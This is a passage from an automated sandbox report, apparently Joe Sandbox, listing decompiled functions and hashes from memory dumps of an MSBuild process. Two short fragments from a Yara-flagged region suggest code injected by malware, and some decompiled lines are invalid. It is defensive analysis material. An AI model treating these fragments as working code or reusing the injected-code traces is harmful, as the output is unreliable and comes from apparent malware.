                                            					return E010B8DF1(__ebx, 0xc0000374, 0x10f5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
                                            				}
                                            			}







                                            0x010c2076
                                            0x010c2078
                                            0x010c207d
                                            0x010c2083
                                            0x010c20a4
                                            0x010c20aa
                                            0x010c20ac
                                            0x010c20b7
                                            0x010c20ba
                                            0x010c20bc
                                            0x010c20c9
                                            0x010c20c9
                                            0x010c20d0
                                            0x010c20d2
                                            0x00000000
                                            0x010c20d2
                                            0x010c20be
                                            0x010c20c3
                                            0x010c20c5
                                            0x010c20c7
                                            0x00000000
                                            0x00000000
                                            0x010c20c7
                                            0x010c20bc
                                            0x010c20d4
                                            0x010c2085
                                            0x010c2085
                                            0x010c20a3
                                            0x010c20a3

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8d3770eb8ead42d46ce43490c17e671e41e9da2cc7eab7d89e3b66c36dbabf2b
                                            • Instruction ID: a52b248aa43d56699ae65a9fdb4821096bdd008d3b8ea7614d25f467d144a306
                                            • Opcode Fuzzy Hash: 8d3770eb8ead42d46ce43490c17e671e41e9da2cc7eab7d89e3b66c36dbabf2b
                                            • Instruction Fuzzy Hash: EAF0203A4112858ADF72AB2864023EA2FD2E755A10F2940CFE5D017E0BC83AC883CF20
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 54%
                                            			E0104927A(void* __ecx) {
                                            				signed int _t11;
                                            				void* _t14;
                                            
                                            				_t11 = L01024620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
                                            				if(_t11 != 0) {
                                            					E0104FA60(_t11, 0, 0x98);
                                            					asm("movsd");
                                            					asm("movsd");
                                            					asm("movsd");
                                            					asm("movsd");
                                            					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
                                            					 *((intOrPtr*)(_t11 + 0x24)) = 1;
                                            					E010492C6(_t11, _t14);
                                            				}
                                            				return _t11;
                                            			}





                                            0x01049295
                                            0x01049299
                                            0x0104929f
                                            0x010492aa
                                            0x010492ad
                                            0x010492ae
                                            0x010492af
                                            0x010492b0
                                            0x010492b4
                                            0x010492bb
                                            0x010492bb
                                            0x010492c5

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                            • Instruction ID: d58669fbfa1f1e10373cc07339ac2628f94badfceb286bce47aac7caa3dbee20
                                            • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                                            • Instruction Fuzzy Hash: 4DE022B23406016BE7219E0ACCC4F8737ADEF96724F044078F9005E282CAE6DD0887A0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 43%
                                            			E010D8D34(intOrPtr __ecx, intOrPtr __edx) {
                                            				signed int _v8;
                                            				intOrPtr _v12;
                                            				intOrPtr _v16;
                                            				short _v42;
                                            				char _v48;
                                            				signed char* _t12;
                                            				intOrPtr _t18;
                                            				intOrPtr _t24;
                                            				intOrPtr _t25;
                                            				signed int _t26;
                                            
                                            				_t23 = __edx;
                                            				_v8 =  *0x10fd360 ^ _t26;
                                            				_v16 = __ecx;
                                            				_v42 = 0x1c2b;
                                            				_v12 = __edx;
                                            				if(E01027D50() == 0) {
                                            					_t12 = 0x7ffe0386;
                                            				} else {
                                            					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                            				}
                                            				_push( &_v48);
                                            				_push(8);
                                            				_push(0x20402);
                                            				_push( *_t12 & 0x000000ff);
                                            				return E0104B640(E01049AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
                                            			}













                                            0x010d8d34
                                            0x010d8d43
                                            0x010d8d4b
                                            0x010d8d4e
                                            0x010d8d52
                                            0x010d8d5c
                                            0x010d8d6e
                                            0x010d8d5e
                                            0x010d8d67
                                            0x010d8d67
                                            0x010d8d79
                                            0x010d8d7a
                                            0x010d8d7c
                                            0x010d8d81
                                            0x010d8d94

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 507087268526a08aa2f205739980382e7ce396dd0823c8a051654338e2bb18d4
                                            • Instruction ID: 66d0ccbc1bf22f270e579d02399ebad165f560e30760f5560df8b74965b6f760
                                            • Opcode Fuzzy Hash: 507087268526a08aa2f205739980382e7ce396dd0823c8a051654338e2bb18d4
                                            • Instruction Fuzzy Hash: 81F05470A4470DAFDB14EFB8D546BAE77B4EF18700F5080A9E945EB291EA34D900C754
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 36%
                                            			E010D8B58(intOrPtr __ecx) {
                                            				signed int _v8;
                                            				intOrPtr _v20;
                                            				short _v46;
                                            				char _v52;
                                            				signed char* _t11;
                                            				intOrPtr _t17;
                                            				intOrPtr _t22;
                                            				intOrPtr _t23;
                                            				intOrPtr _t24;
                                            				signed int _t25;
                                            
                                            				_v8 =  *0x10fd360 ^ _t25;
                                            				_v20 = __ecx;
                                            				_v46 = 0x1c26;
                                            				if(E01027D50() == 0) {
                                            					_t11 = 0x7ffe0386;
                                            				} else {
                                            					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                            				}
                                            				_push( &_v52);
                                            				_push(4);
                                            				_push(0x402);
                                            				_push( *_t11 & 0x000000ff);
                                            				return E0104B640(E01049AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                                            			}













                                            0x010d8b67
                                            0x010d8b6f
                                            0x010d8b72
                                            0x010d8b7d
                                            0x010d8b8f
                                            0x010d8b7f
                                            0x010d8b88
                                            0x010d8b88
                                            0x010d8b9a
                                            0x010d8b9b
                                            0x010d8b9d
                                            0x010d8ba2
                                            0x010d8bb5

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 8de40ba711495d8b83a1d8d1054961d35ce40996dc13bdb0619f4e3bd92592bd
                                            • Instruction ID: 9514cd79db7b210e61dc327255f93d2a29b06980d328d42a2916c600a0b5915a
                                            • Opcode Fuzzy Hash: 8de40ba711495d8b83a1d8d1054961d35ce40996dc13bdb0619f4e3bd92592bd
                                            • Instruction Fuzzy Hash: F1F089B0A04259ABDB10EBB8D546E6E77B4EF14300F444469FA45DB381EA34D900C794
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 88%
                                            			E0102746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
                                            				signed int _t8;
                                            				void* _t10;
                                            				short* _t17;
                                            				void* _t19;
                                            				intOrPtr _t20;
                                            				void* _t21;
                                            
                                            				_t20 = __esi;
                                            				_t19 = __edi;
                                            				_t17 = __ebx;
                                            				if( *((char*)(_t21 - 0x25)) != 0) {
                                            					if(__ecx == 0) {
                                            						E0101EB70(__ecx, 0x10f79a0);
                                            					} else {
                                            						asm("lock xadd [ecx], eax");
                                            						if((_t8 | 0xffffffff) == 0) {
                                            							_push( *((intOrPtr*)(__ecx + 4)));
                                            							E010495D0();
                                            							L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
                                            							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
                                            							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
                                            						}
                                            					}
                                            					L10:
                                            				}
                                            				_t10 = _t19 + _t19;
                                            				if(_t20 >= _t10) {
                                            					if(_t19 != 0) {
                                            						 *_t17 = 0;
                                            						return 0;
                                            					}
                                            				}
                                            				return _t10;
                                            				goto L10;
                                            			}









                                            0x0102746d
                                            0x0102746d
                                            0x0102746d
                                            0x01027471
                                            0x01027488
                                            0x0106f92d
                                            0x0102748e
                                            0x01027491
                                            0x01027495
                                            0x0106f937
                                            0x0106f93a
                                            0x0106f94e
                                            0x0106f953
                                            0x0106f956
                                            0x0106f956
                                            0x01027495
                                            0x00000000
                                            0x01027488
                                            0x01027473
                                            0x01027478
                                            0x0102747d
                                            0x01027481
                                            0x00000000
                                            0x01027481
                                            0x0102747d
                                            0x0102747a
                                            0x00000000

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: fe306661e320dd1b760ba3739a9e653c54ecb8321facdba64822dbaea5f7cac8
                                            • Instruction ID: 161426a721c5a79458127e6e914a9ec0a5fd4ea484a927ee120d4ef73175d537
                                            • Opcode Fuzzy Hash: fe306661e320dd1b760ba3739a9e653c54ecb8321facdba64822dbaea5f7cac8
                                            • Instruction Fuzzy Hash: 19F0E934944166EADF4A976CC840BBEFFB1BF34314F040255D9D1AB151EB249800C796
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 36%
                                            			E010D8CD6(intOrPtr __ecx) {
                                            				signed int _v8;
                                            				intOrPtr _v12;
                                            				short _v38;
                                            				char _v44;
                                            				signed char* _t11;
                                            				intOrPtr _t17;
                                            				intOrPtr _t22;
                                            				intOrPtr _t23;
                                            				intOrPtr _t24;
                                            				signed int _t25;
                                            
                                            				_v8 =  *0x10fd360 ^ _t25;
                                            				_v12 = __ecx;
                                            				_v38 = 0x1c2d;
                                            				if(E01027D50() == 0) {
                                            					_t11 = 0x7ffe0386;
                                            				} else {
                                            					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                            				}
                                            				_push( &_v44);
                                            				_push(0xffffffe4);
                                            				_push(0x402);
                                            				_push( *_t11 & 0x000000ff);
                                            				return E0104B640(E01049AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                                            			}













                                            0x010d8ce5
                                            0x010d8ced
                                            0x010d8cf0
                                            0x010d8cfb
                                            0x010d8d0d
                                            0x010d8cfd
                                            0x010d8d06
                                            0x010d8d06
                                            0x010d8d18
                                            0x010d8d19
                                            0x010d8d1b
                                            0x010d8d20
                                            0x010d8d33

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f679a67c1f1bfcf26bd5ea13a69dee086439d1a910c311a56bf7fa5529bb9427
                                            • Instruction ID: 0fa6fa80f16f92de3ec38c735a18c8976bfb6d4521a246ab3f2979045938351e
                                            • Opcode Fuzzy Hash: f679a67c1f1bfcf26bd5ea13a69dee086439d1a910c311a56bf7fa5529bb9427
                                            • Instruction Fuzzy Hash: B6F0A770A04209AFDF04EBB8D946EAE77B8EF18300F5041AAF955EB3C1EA34D900C754
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E01004F2E(void* __ecx, char _a4) {
                                            				void* __esi;
                                            				void* __ebp;
                                            				void* _t17;
                                            				void* _t19;
                                            				void* _t20;
                                            				void* _t21;
                                            
                                            				_t18 = __ecx;
                                            				_t21 = __ecx;
                                            				if(__ecx == 0) {
                                            					L6:
                                            					__eflags = _a4;
                                            					if(__eflags != 0) {
                                            						L8:
                                            						E010D88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                                            						L9:
                                            						return 0;
                                            					}
                                            					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                                            					if(__eflags != 0) {
                                            						goto L9;
                                            					}
                                            					goto L8;
                                            				}
                                            				_t18 = __ecx + 0x30;
                                            				if(E0102C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0xfe1030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                            					goto L6;
                                            				} else {
                                            					return 1;
                                            				}
                                            			}









                                            0x01004f2e
                                            0x01004f34
                                            0x01004f38
                                            0x01060b85
                                            0x01060b85
                                            0x01060b89
                                            0x01060b9a
                                            0x01060b9a
                                            0x01060b9f
                                            0x00000000
                                            0x01060b9f
                                            0x01060b94
                                            0x01060b98
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x01060b98
                                            0x01004f3e
                                            0x01004f48
                                            0x00000000
                                            0x01004f6e
                                            0x00000000
                                            0x01004f70

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c025f1cf16df05d9afc1e32d6c054165227a616076b2ad8287559051845bbfef
                                            • Instruction ID: 8393fd1e58c796bc1be9835c701601e3823d6b2a38d1df7685df575dc389b82a
                                            • Opcode Fuzzy Hash: c025f1cf16df05d9afc1e32d6c054165227a616076b2ad8287559051845bbfef
                                            • Instruction Fuzzy Hash: 12F0E2329A56948FE7B2CB1CC144B26B7DCAF01778F04E4A5E58687926C734EC80C644
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0103A44B(signed int __ecx) {
                                            				intOrPtr _t13;
                                            				signed int _t15;
                                            				signed int* _t16;
                                            				signed int* _t17;
                                            
                                            				_t13 =  *0x10f7b9c; // 0x0
                                            				_t15 = __ecx;
                                            				_t16 = L01024620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
                                            				if(_t16 == 0) {
                                            					return 0;
                                            				}
                                            				 *_t16 = _t15;
                                            				_t17 =  &(_t16[2]);
                                            				E0104FA60(_t17, 0, _t15 << 2);
                                            				return _t17;
                                            			}







                                            0x0103a44b
                                            0x0103a453
                                            0x0103a472
                                            0x0103a476
                                            0x00000000
                                            0x0103a493
                                            0x0103a47a
                                            0x0103a47f
                                            0x0103a486
                                            0x00000000

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 93cb9bbf9b1714b3cffaab1968d51ecd7ed83d3d21fa05861169bcaa8ff26a4b
                                            • Instruction ID: 464aa188f00ba0c186a6548336372007bc54184067fc81accde7e5025f2d94aa
                                            • Opcode Fuzzy Hash: 93cb9bbf9b1714b3cffaab1968d51ecd7ed83d3d21fa05861169bcaa8ff26a4b
                                            • Instruction Fuzzy Hash: 24E092B2B01422ABD2219B18AC00FA773ADDBE5651F094039EA84C7214DA68DD11C7E1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 79%
                                            			E0100F358(void* __ecx, signed int __edx) {
                                            				char _v8;
                                            				signed int _t9;
                                            				void* _t20;
                                            
                                            				_push(__ecx);
                                            				_t9 = 2;
                                            				_t20 = 0;
                                            				if(E0103F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
                                            					_t20 = L01024620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                            				}
                                            				return _t20;
                                            			}






                                            0x0100f35d
                                            0x0100f361
                                            0x0100f367
                                            0x0100f372
                                            0x0100f38c
                                            0x0100f38c
                                            0x0100f394

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                            • Instruction ID: 0f625e811a87d9c204ec3d8bcccee2a905a00bdb906d51b3b789e0738e7cc7c3
                                            • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                                            • Instruction Fuzzy Hash: 31E0D832A40219FBDB3196D99D05F9ABFACDB58AA0F004195FA04D7190D9619D00D6D1
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0101FF60(intOrPtr _a4) {
                                            				void* __ecx;
                                            				void* __ebp;
                                            				void* _t13;
                                            				intOrPtr _t14;
                                            				void* _t15;
                                            				void* _t16;
                                            				void* _t17;
                                            
                                            				_t14 = _a4;
                                            				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0xfe11a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                            					return E010D88F5(_t13, _t14, _t15, _t16, _t17, __eflags);
                                            				} else {
                                            					return E01020050(_t14);
                                            				}
                                            			}










                                            0x0101ff66
                                            0x0101ff6b
                                            0x00000000
                                            0x0101ff8f
                                            0x00000000
                                            0x0101ff8f

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6884f663e75425886cdeee0f611648995bd9a8f65c02e3b87cce7bdaa5863694
                                            • Instruction ID: 51d4f787409fb3c96c3e12fd58e5c86ed387834660a473b0dee21e3a5c5405c5
                                            • Opcode Fuzzy Hash: 6884f663e75425886cdeee0f611648995bd9a8f65c02e3b87cce7bdaa5863694
                                            • Instruction Fuzzy Hash: 74E0DFB02093479FE735DB5AD080F293BDCBF52729F19809EF08A4B106C6F9D884C686
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 82%
                                            			E010941E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                            				void* _t5;
                                            				void* _t14;
                                            
                                            				_push(8);
                                            				_push(0x10e08f0);
                                            				_t5 = E0105D08C(__ebx, __edi, __esi);
                                            				if( *0x10f87ec == 0) {
                                            					E0101EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                            					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
                                            					if( *0x10f87ec == 0) {
                                            						 *0x10f87f0 = 0x10f87ec;
                                            						 *0x10f87ec = 0x10f87ec;
                                            						 *0x10f87e8 = 0x10f87e4;
                                            						 *0x10f87e4 = 0x10f87e4;
                                            					}
                                            					 *(_t14 - 4) = 0xfffffffe;
                                            					_t5 = L01094248();
                                            				}
                                            				return E0105D0D1(_t5);
                                            			}





                                            0x010941e8
                                            0x010941ea
                                            0x010941ef
                                            0x010941fb
                                            0x01094206
                                            0x0109420b
                                            0x01094216
                                            0x0109421d
                                            0x01094222
                                            0x0109422c
                                            0x01094231
                                            0x01094231
                                            0x01094236
                                            0x0109423d
                                            0x0109423d
                                            0x01094247

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: f9fd50bbb46db5e053a779322336edcf9a685aed4b52c08acd518a0b0fd25711
                                            • Instruction ID: 0d46f74810b8bf13abd7bda8f888516175f43827ce07bd5151e397a99204f612
                                            • Opcode Fuzzy Hash: f9fd50bbb46db5e053a779322336edcf9a685aed4b52c08acd518a0b0fd25711
                                            • Instruction Fuzzy Hash: 6AF01574911702CECBB1EFAAD60678836E4F754320F4081EF91C087A98C77984A1DF01
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E010BD380(void* __ecx, void* __edx, intOrPtr _a4) {
                                            				void* _t5;
                                            
                                            				if(_a4 != 0) {
                                            					_t5 = L0100E8B0(__ecx, _a4, 0xfff);
                                            					L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                                            					return _t5;
                                            				}
                                            				return 0xc000000d;
                                            			}




                                            0x010bd38a
                                            0x010bd39b
                                            0x010bd3b1
                                            0x00000000
                                            0x010bd3b6
                                            0x00000000

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                            • Instruction ID: 15f8570d3a1a24dac74c6a2cc239a580122e0751cb673a3211335254d2078cd5
                                            • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                                            • Instruction Fuzzy Hash: F4E0C231281615BBEB225E84CC00FE9BB56EB60BA4F108031FE886AA91C6759D91D7C4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E0103A185() {
                                            				void* __ecx;
                                            				intOrPtr* _t5;
                                            
                                            				if( *0x10f67e4 >= 0xa) {
                                            					if(_t5 < 0x10f6800 || _t5 >= 0x10f6900) {
                                            						return L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
                                            					} else {
                                            						goto L1;
                                            					}
                                            				} else {
                                            					L1:
                                            					return E01020010(0x10f67e0, _t5);
                                            				}
                                            			}





                                            0x0103a190
                                            0x0103a1a6
                                            0x0103a1c2
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x0103a192
                                            0x0103a192
                                            0x0103a19f
                                            0x0103a19f

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 9a01744270cd0185611a076bb40d427739da2a4561b82ed01244f3b0d16e207c
                                            • Instruction ID: b77d29966252e38bb5eff837a9e53f34d4f65f4c60077d1f44f918110e0e29a6
                                            • Opcode Fuzzy Hash: 9a01744270cd0185611a076bb40d427739da2a4561b82ed01244f3b0d16e207c
                                            • Instruction Fuzzy Hash: 7DD02E71221100AAC62D2310C866BA2321AF7E0760F34084CF3C78BDA8EA6688D48208
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 25%
                                            			E00417322(void* __eax, void* __edx) {
                                            				signed int _t10;
                                            
                                            				asm("out 0x2a, eax");
                                            				 *(__edx + 0x60e55f7) =  *(__edx + 0x60e55f7) | _t10;
                                            				asm("stosd");
                                            				asm("invalid");
                                            				return __eax;
                                            			}




                                            0x00417322
                                            0x00417324
                                            0x0041732b
                                            0x0041732c
                                            0x0041733c

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 4f706b8ef9b959b93bf45fa1485e7f0171a2f25af2f597f76832a94847ab05dd
                                            • Instruction ID: 9ec7a68c146dc130d1d70239402a18cf4b8357e358f4cf8be86ba19b038b4449
                                            • Opcode Fuzzy Hash: 4f706b8ef9b959b93bf45fa1485e7f0171a2f25af2f597f76832a94847ab05dd
                                            • Instruction Fuzzy Hash: 21C08C23BA45191108012C9EB8812F0F3B4F28E465F0023BBCD0CE3110E222804901FB
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E010316E0(void* __edx, void* __eflags) {
                                            				void* __ecx;
                                            				void* _t3;
                                            
                                            				_t3 = E01031710(0x10f67e0);
                                            				if(_t3 == 0) {
                                            					_t6 =  *[fs:0x30];
                                            					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
                                            						goto L1;
                                            					} else {
                                            						return L01024620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
                                            					}
                                            				} else {
                                            					L1:
                                            					return _t3;
                                            				}
                                            			}





                                            0x010316e8
                                            0x010316ef
                                            0x010316f3
                                            0x010316fe
                                            0x00000000
                                            0x01031700
                                            0x0103170d
                                            0x0103170d
                                            0x010316f2
                                            0x010316f2
                                            0x010316f2
                                            0x010316f2

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 7d780e861d13a68da988be0739c1632369d0b02e6603d81b5ef242fc33376600
                                            • Instruction ID: da6ff7971571c4c6a261242d36be5666f58dc24e31ec45510ebe695b6839f32f
                                            • Opcode Fuzzy Hash: 7d780e861d13a68da988be0739c1632369d0b02e6603d81b5ef242fc33376600
                                            • Instruction Fuzzy Hash: C7D0A731100201A2EA2D5B15A804B143699FBDC781F3800ACF347498C0CFB1DC93F448
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 58%
                                            			E00407B1B(void* __eax, signed int __edx, void* __edi) {
                                            
                                            				 *(__edx + 0x31) =  *(__edx + 0x31) & __edx;
                                            				_push(0x20401054);
                                            				return 1;
                                            			}



                                            0x00407b1d
                                            0x00407b20
                                            0x00407b3a

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.376099610.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c53576bdaf095d9da02f23de303ec49a15a9b60ce471a0b5607834e47b91226e
                                            • Instruction ID: 0fe7da88b525c209cabc8176e389a1a44f3e062534907df70c45433c75e62a58
                                            • Opcode Fuzzy Hash: c53576bdaf095d9da02f23de303ec49a15a9b60ce471a0b5607834e47b91226e
                                            • Instruction Fuzzy Hash: CCC08C23AAE04200C210884CB8C13FCE395E383138F5032A3E894E3002A48EC8E54088
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E010853CA(void* __ebx) {
                                            				intOrPtr _t7;
                                            				void* _t13;
                                            				void* _t14;
                                            				intOrPtr _t15;
                                            				void* _t16;
                                            
                                            				_t13 = __ebx;
                                            				if( *((char*)(_t16 - 0x65)) != 0) {
                                            					E0101EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                            					_t7 =  *((intOrPtr*)(_t16 - 0x64));
                                            					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
                                            				}
                                            				if(_t15 != 0) {
                                            					L010277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
                                            					return  *((intOrPtr*)(_t16 - 0x64));
                                            				}
                                            				return _t7;
                                            			}








                                            0x010853ca
                                            0x010853ce
                                            0x010853d9
                                            0x010853de
                                            0x010853e1
                                            0x010853e1
                                            0x010853e6
                                            0x010853f3
                                            0x00000000
                                            0x010853f8
                                            0x010853fb

                                            Memory Dump Source
                                            • Source File: 00000003.00000002.379547929.0000000000FE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00FE0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_3_2_fe0000_MSBuild.jbxd
                                            Similarity
                                            • API ID:
